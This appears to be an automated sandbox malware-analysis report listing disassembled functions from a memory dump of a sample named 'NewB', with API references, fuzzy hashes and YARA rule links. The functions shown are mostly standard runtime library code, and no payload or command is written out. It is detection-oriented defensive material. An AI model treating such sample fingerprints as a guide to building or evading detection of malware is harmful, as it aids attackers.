GetLastError.KERNEL32(?,?,?,?,?,?,?,001D195A,001CA692,00000000,?,?,?,?,00000000), ref: 001D6065

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: b8adfc9ab0ed520a761c0403043142ab4959d8096b72674e9e61348e5432de91
Instruction ID: a0bcbcd999beba28153e7a6eab38206ec775d262f9f51adcba23c600b15fafca
Opcode Fuzzy Hash: b8adfc9ab0ed520a761c0403043142ab4959d8096b72674e9e61348e5432de91
Instruction Fuzzy Hash: 7641DA32500605ABDB21ABB8CC46F9E7776AF74360F250116F524EB3D2EB74CC458BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00192F80 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 0019301F
GetCurrentThreadId.KERNEL32 ref: 0019303E
__Mtx_unlock.LIBCPMT ref: 0019308C
__Cnd_broadcast.LIBCPMT ref: 001930A3

Part of subcall function 001AC79C: mtx_do_lock.LIBCPMT ref: 001AC7A4

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcastCurrentThreadmtx_do_lock
String ID:
API String ID: 3471820992-0
Opcode ID: 4adbf51c03ed6d0b5e70de972e97e2fb351d5ee93b6a12f103a86ed1aa7c37f2
Instruction ID: ceaa515cb0c899cd3684028c9ac149e2dbdce29ec1169a10a65c301576731ba6
Opcode Fuzzy Hash: 4adbf51c03ed6d0b5e70de972e97e2fb351d5ee93b6a12f103a86ed1aa7c37f2
Instruction Fuzzy Hash: C241CFB5A006059FDF20DF74C944B6AB7E8FF25314F048529E926D7641EB35EA04CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 001B2DED Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 001B2E00

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: BuffersConcurrency::details::InitializeManager::Resource
String ID:
API String ID: 3433162309-0
Opcode ID: 6d3739ec0b4a2ad03bb44ea6c4514067282b907afc6f6af82632c26de86bf0a8
Instruction ID: 6c8e5799695779e73cd3013326829b59eafd7b5296cabbe3517151e712c1f8b7
Opcode Fuzzy Hash: 6d3739ec0b4a2ad03bb44ea6c4514067282b907afc6f6af82632c26de86bf0a8
Instruction Fuzzy Hash: EB314775A00309DFCF15DF95C8C0AEE7BB9AF54310F1400AAE941AB346D770E949CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001CD8A0 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 001C6A89: _free.LIBCMT ref: 001C6A97

Part of subcall function 001CE877: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,001D4D10,?,00000000,00000000), ref: 001CE919

GetLastError.KERNEL32 ref: 001CD908
__dosmaperr.LIBCMT ref: 001CD90F
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 001CD94E
__dosmaperr.LIBCMT ref: 001CD955

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 47b16682da3ebebc0779926e1b5e5575a16df0df0c891001f22961283d63ddd2
Instruction ID: 7126e3686826ca7500046671861362892b76bffd11f1c9d34001d017adf8a2d8
Opcode Fuzzy Hash: 47b16682da3ebebc0779926e1b5e5575a16df0df0c891001f22961283d63ddd2
Instruction Fuzzy Hash: 5C219075604605AFDB106FA5AC80F2AB7A9EF35368710852CF81997140E771ED41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001C0B8B Relevance: 6.1, APIs: 4, Instructions: 80threadCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000,?), ref: 001C0BDC
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 001C0BC4

Part of subcall function 001B9022: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 001B9043

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 001C0C3F
SwitchToThread.KERNEL32(00000005,00000004,00000000,?,?,?,?,?,?,?,001EF9A8), ref: 001C0C44

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Context$Event$Base::Concurrency::details::$Trace$SwitchThreadThrow
String ID:
API String ID: 2734100425-0
Opcode ID: 7d333a664553c97acce0ec747306e6e78c06121e30c95fed02ff9c724294c484
Instruction ID: 5de6caf7ae69454c270663569a0d0bee44bdf258af8e13f8073c2c77fa6a1a59
Opcode Fuzzy Hash: 7d333a664553c97acce0ec747306e6e78c06121e30c95fed02ff9c724294c484
Instruction Fuzzy Hash: DA21F675600214AFCB15FB98CC45FAEB7ACEF5C324B10005AFA16A3291CB70ED41CAA4

Uniqueness

Uniqueness Score: -1.00%

Function 001B9D88 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 001B9D8F
Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 001B9DDB
std::bad_exception::bad_exception.LIBCMT ref: 001B9DF1
std::bad_exception::bad_exception.LIBCMT ref: 001B9E5D

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: std::bad_exception::bad_exception$Concurrency::H_prolog3_catchPolicyPolicy::_SchedulerValidValue
String ID:
API String ID: 2033596534-0
Opcode ID: 6bf6fd82978b0e3b66c07f2884e91a3a685c8ee2b8b3baa9a749171f8ddf92d7
Instruction ID: 4472c88679ac467cb9af71382cd9b6f96361e24ea026e05c17b0deb31c8c44c8
Opcode Fuzzy Hash: 6bf6fd82978b0e3b66c07f2884e91a3a685c8ee2b8b3baa9a749171f8ddf92d7
Instruction Fuzzy Hash: 57219835904614DFDB05EFA4D4829EEB7B4FF26310F214069F616AB291DB31AD43CB54

Uniqueness

Uniqueness Score: -1.00%

Function 001CAE53 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,001C6A07,?,?,?,?,001C763B,?), ref: 001CAE58
_free.LIBCMT ref: 001CAEB5
_free.LIBCMT ref: 001CAEEB
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,001C6A07,?,?,?,?,001C763B,?), ref: 001CAEF6

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 2bca4ba3a33a34eef75d357c74610a79f5c91c17877cf7240a9355bb09d59a30
Instruction ID: 9026f4a271182b2efbc9268817bb92790a0a5011a3bb643a9e438522b13e47e2
Opcode Fuzzy Hash: 2bca4ba3a33a34eef75d357c74610a79f5c91c17877cf7240a9355bb09d59a30
Instruction Fuzzy Hash: E611E3322082496AC61226B86CC6F3B235DAFF1778BA4022CF220C65D1EF71CC419166

Uniqueness

Uniqueness Score: -1.00%

Function 001CAFAA Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,001C75D5,00192307), ref: 001CAFAF
_free.LIBCMT ref: 001CB00C
_free.LIBCMT ref: 001CB042
SetLastError.KERNEL32(00000000,00000006,000000FF,?,001C75D5,00192307), ref: 001CB04D

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 8adc9528971a87d1f977cc34e9a91610b622c02ce53eeb8055b23950256c4e30
Instruction ID: d82fc72b3dd16fd4c695c2402e1abe6f6f865d0e4e4a06012ab5a0fbfa6b2d5b
Opcode Fuzzy Hash: 8adc9528971a87d1f977cc34e9a91610b622c02ce53eeb8055b23950256c4e30
Instruction Fuzzy Hash: A811C67260C7046AC61226746CC7F3F2269ABF0778F65022CF224D65D1DF75CC419166

Uniqueness

Uniqueness Score: -1.00%

Function 001AF3DD Relevance: 6.1, APIs: 4, Instructions: 55timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 001AF3FF

Part of subcall function 001AF5BB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 001B5577

Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 001AF420

Part of subcall function 001B02A3: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 001B02BF

Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 001AF43C
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 001AF443

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
String ID:
API String ID: 1684785560-0
Opcode ID: 822c5c48bb1114364e009bb9dfd01fc8306624a9752796c5dd49f9c2be2ea3dc
Instruction ID: addd91b949de8a6a1c25cfd17f3b4a5148b78295f01be77ae8b643a220d92692
Opcode Fuzzy Hash: 822c5c48bb1114364e009bb9dfd01fc8306624a9752796c5dd49f9c2be2ea3dc
Instruction Fuzzy Hash: A401F979500305ABD7207FE88C86D9BFBACEF26354B10893EF855D2142D770D90587A1

Uniqueness

Uniqueness Score: -1.00%

Function 001C34B1 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 001C34CB
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 001C34DF
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 001C34F7
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 001C350F

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction ID: c8bfadd7d71e2476c59ec6b4ef029014c45fa6f6c56ca3667c89f358b80a8344
Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction Fuzzy Hash: 2C01D632600514A7CF1AAF55C841FEFB7A99F74350F004059FD21A7281DB71EE1096E1

Uniqueness

Uniqueness Score: -1.00%

Function 001CB69D Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,001CB802,00000000,?,001D1EFB,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 001CB6B3
GetLastError.KERNEL32(?,001D1EFB,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,001CB802,00000000,00000104,?), ref: 001CB6BD
__dosmaperr.LIBCMT ref: 001CB6C4

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 216ba31ac1f5b9bc9887f539d46bd7a51e93cec8337fa9118fa1ac72308da4f6
Instruction ID: c702a3ce02ada0626061e43b353a8c7af2c28e90a606a4bb9ae6c34e6df835a7
Opcode Fuzzy Hash: 216ba31ac1f5b9bc9887f539d46bd7a51e93cec8337fa9118fa1ac72308da4f6
Instruction Fuzzy Hash: B5F06D3220812ABBCB212BA2DC49F5ABF6DFF643A07104119F919C6560D771E891DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 001CB706 Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,001CB802,00000000,?,001D1E86,00000000,00000000,001CB802,?,?,00000000,00000000,00000001), ref: 001CB71C
GetLastError.KERNEL32(?,001D1E86,00000000,00000000,001CB802,?,?,00000000,00000000,00000001,00000000,00000000,?,001CB802,00000000,00000104), ref: 001CB726
__dosmaperr.LIBCMT ref: 001CB72D

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 223e7cbb7115ab5bba8f317870f6b04efe6f3b312fa5a548cd70d48baa2c6053
Instruction ID: d44f551ded8f776e318e7d90fe89bedb671076efaebff4c1f9537b3267ea9b65
Opcode Fuzzy Hash: 223e7cbb7115ab5bba8f317870f6b04efe6f3b312fa5a548cd70d48baa2c6053
Instruction Fuzzy Hash: E4F08132204215BBCB212BA2DC89E5ABF6DFFA83A0B00451DF91CC6460D771E891DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 001B50F6 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001B0057: TlsGetValue.KERNEL32(?,?,001AF5D7,001AF404,?,?), ref: 001B005D

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 001B5120

Part of subcall function 001BE401: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 001BE428
Part of subcall function 001BE401: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 001BE441
Part of subcall function 001BE401: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 001BE4B7
Part of subcall function 001BE401: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 001BE4BF

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 001B512E
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 001B5138
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 001B5142

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceValueVirtualWork
String ID:
API String ID: 2616382602-0
Opcode ID: b467ed9e088a07727f9b6eaa713dc914cefcf4d35b793a7839bde56eb5acb355
Instruction ID: 7a60a26f81fcdcb220ebfcb5013255933e02ffc2499ebfeabfdcd40e49337920
Opcode Fuzzy Hash: b467ed9e088a07727f9b6eaa713dc914cefcf4d35b793a7839bde56eb5acb355
Instruction Fuzzy Hash: 23F0F6756009186BCB15B366D816FEEFB6B5FB1B50B004129F90193282DF36DE11C7C1

Uniqueness

Uniqueness Score: -1.00%

Function 001B9603 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 001B960C

Part of subcall function 001AF5BB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 001B5577

Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 001B9630
Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 001B9643
Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 001B964C

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
String ID:
API String ID: 218105897-0
Opcode ID: 286b84610833cc548c653b23f9a84c5695ef3105fb3579eb3866e9586b336a7e
Instruction ID: 30dff524fd282c2705587b420525def3107eea55eeaa9bc092a3544962c34292
Opcode Fuzzy Hash: 286b84610833cc548c653b23f9a84c5695ef3105fb3579eb3866e9586b336a7e
Instruction Fuzzy Hash: 40F06571200A209EE635AA689851FAA23D89F64714F00C81DE66B9B282CF64E943CF91

Uniqueness

Uniqueness Score: -1.00%

Function 001D6A1F Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00197710,0000000F,001F0008,00000000,00197710,?,001D510A,00197710,00000001,00197710,00197710,?,001CFFE5,00000000,?,00197710), ref: 001D6A36
GetLastError.KERNEL32(?,001D510A,00197710,00000001,00197710,00197710,?,001CFFE5,00000000,?,00197710,00000000,00197710,?,001D0539,00197710), ref: 001D6A42

Part of subcall function 001D6A08: CloseHandle.KERNEL32(FFFFFFFE,001D6A52,?,001D510A,00197710,00000001,00197710,00197710,?,001CFFE5,00000000,?,00197710,00000000,00197710), ref: 001D6A18

___initconout.LIBCMT ref: 001D6A52

Part of subcall function 001D69CA: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001D69F9,001D50F7,00197710,?,001CFFE5,00000000,?,00197710,00000000), ref: 001D69DD

WriteConsoleW.KERNEL32(00197710,0000000F,001F0008,00000000,?,001D510A,00197710,00000001,00197710,00197710,?,001CFFE5,00000000,?,00197710,00000000), ref: 001D6A67

Memory Dump Source

Source File: 0000001A.00000002.2432596544.0000000000191000.00000020.00000001.01000000.00000016.sdmp, Offset: 00190000, based on PE: true

Associated: 0000001A.00000002.2432524523.0000000000190000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432638855.00000000001E0000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432662099.00000000001F2000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432682823.00000000001F4000.00000008.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432703030.00000000001F5000.00000004.00000001.01000000.00000016.sdmpDownload File
Associated: 0000001A.00000002.2432722537.00000000001F7000.00000002.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_190000_NewB.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: d71177152619474e58d3ec8bb05d019a8a06447bc3f236c544236ff2b77f3401
Instruction ID: 51b6cdd940cd04cf7bdf92fc3ad69b27385991d36e2306f88efdcca95b48a383
Opcode Fuzzy Hash: d71177152619474e58d3ec8bb05d019a8a06447bc3f236c544236ff2b77f3401
Instruction Fuzzy Hash: F2F03036400165BBCF221FD5DC4899D3F66FB4C3A1F018011FA189A630C7728DA0DB90

Uniqueness

Uniqueness Score: -1.00%

